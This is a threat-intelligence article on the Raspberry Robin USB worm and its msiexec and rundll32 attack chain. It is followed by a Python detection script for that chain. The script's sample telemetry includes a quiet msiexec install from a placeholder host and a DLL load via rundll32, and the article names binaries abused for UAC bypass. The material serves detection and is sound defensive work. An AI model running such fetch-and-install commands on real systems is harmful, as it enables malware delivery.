    USB-based Wormable Raspberry Robin Malware Targeting Windows Installer

    The Raspberry Robin malware is distributed via external drives and uses the Microsoft Standard Installer (msiexec.exe) to execute malicious commands.

    Red Canary’s Detection Engineering team has discovered a new worm-like Windows malware being distributed via removable USB drives. The malware was detected in several customer networks, mainly in the manufacturing and technology sectors.

    About Raspberry Robin

    Red Canary intelligence analysts attributed the malware to the Raspberry Robin cluster, noting that the worm leverages “Windows Installer” to access QNAP-linked domains and download a malicious DLL.

    Raspberry Robin’s activity was first documented in September 2021. The operator’s objective is unclear, and researchers also do not yet know when or how the external drives get infected; they suspect that the infection occurs offline.

    Attack Chain Details

    Raspberry Robin’s attack chain starts with connecting an infected external/USB drive to a Windows device. Researchers noted that adversaries commonly use msiexec.exe to deliver malware, while “Raspberry Robin uses msiexec.exe to attempt external network communication to a malicious domain for C2 purposes.”

    Lauren Podber and Stef Rand, Red Canary

    The external drive carries the worm payload, which appears as a .LNK shortcut file inside a legitimate-looking folder. The worm creates a new process using cmd.exe to read and execute the malicious file on the USB drive.

    According to Red Canary’s blog post, once this is done, the worm launches explorer.exe and msiexec.exe. The latter is used to establish network communication with a rogue domain and to download and install the DLL file.

    Figure: Raspberry Robin event outline (Red Canary)

    This DLL is then loaded and executed through legitimate Windows utilities such as rundll32.exe, fodhelper.exe, and odbcconf.exe in order to bypass User Account Control (UAC). Researchers also detected outbound C2 contact from regsvr32.exe, dllhost.exe, and rundll32.exe processes to IP addresses linked with Tor nodes.

    The researchers were unclear about why the worm installs a malicious DLL; they hypothesized that it may be done to maintain persistence on the infected machine.
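    The chain described above (cmd.exe executing a file from the USB drive, msiexec.exe fetching a package from an external domain, rundll32.exe or odbcconf.exe loading the DLL) maps directly onto process-creation telemetry. The Python below is an added detection example, not Red Canary's or the article's code; the event fields, the set of removable drive letters, and every sample command line are constructed assumptions.

```python
import re
from dataclasses import dataclass
from typing import List

@dataclass
class ProcEvent:
    image: str    # process image name, e.g. "msiexec.exe"
    parent: str   # parent process image name
    cmdline: str  # full command line as logged

URL_RE = re.compile(r"https?://", re.IGNORECASE)
DRIVE_RE = re.compile(r"\b([A-Z]):\\", re.IGNORECASE)
# Assumption: drive letters this environment assigns to removable media.
REMOVABLE_DRIVES = {"D", "E", "F"}
# Binaries the article names for loading the DLL and bypassing UAC.
DLL_LOADERS = {"rundll32.exe", "odbcconf.exe"}
CHAIN_PARENTS = {"msiexec.exe", "rundll32.exe", "odbcconf.exe", "fodhelper.exe"}

def classify(ev: ProcEvent) -> List[str]:
    """Return the Raspberry Robin-style behaviours one process event matches."""
    hits = []
    image, parent, cmd = ev.image.lower(), ev.parent.lower(), ev.cmdline.lower()
    # cmd.exe reading/executing a file that lives on a removable drive
    if image == "cmd.exe":
        drives = {d.upper() for d in DRIVE_RE.findall(ev.cmdline)}
        if drives & REMOVABLE_DRIVES:
            hits.append("cmd_exec_from_removable")
    # msiexec.exe pointed at a package on an external host (download + install)
    if image == "msiexec.exe" and URL_RE.search(cmd):
        hits.append("msiexec_remote_package")
    # rundll32/odbcconf loading a DLL from within the installer / UAC-bypass chain
    if image in DLL_LOADERS and ".dll" in cmd and parent in CHAIN_PARENTS:
        hits.append("lolbin_dll_load")
    return hits

def is_suspicious_chain(events: List[ProcEvent]) -> bool:
    """Alert only when at least two distinct stages appear: a lone msiexec
    install from a URL is common enough in enterprise telemetry to be noise."""
    stages = {h for ev in events for h in classify(ev)}
    return len(stages) >= 2

# Constructed sample telemetry (placeholder paths and host, not real artefacts).
SAMPLE_EVENTS = [
    ProcEvent("cmd.exe", "explorer.exe", r'cmd.exe /c "E:\Documents\readme.cmd"'),
    ProcEvent("msiexec.exe", "cmd.exe", "msiexec.exe /q /i http://example.invalid/pkg.msi"),
    ProcEvent("rundll32.exe", "msiexec.exe", r"rundll32.exe C:\Users\Public\x.dll,Start"),
    ProcEvent("msiexec.exe", "explorer.exe", r"msiexec.exe /i C:\Installers\tool.msi"),  # benign
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev.image, "->", classify(ev) or "clean")
    print("chain suspicious:", is_suspicious_chain(SAMPLE_EVENTS))
```

    Tune REMOVABLE_DRIVES from your own endpoint inventory (or join against volume-mount events) before deploying; a fixed letter set is only a stand-in here.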
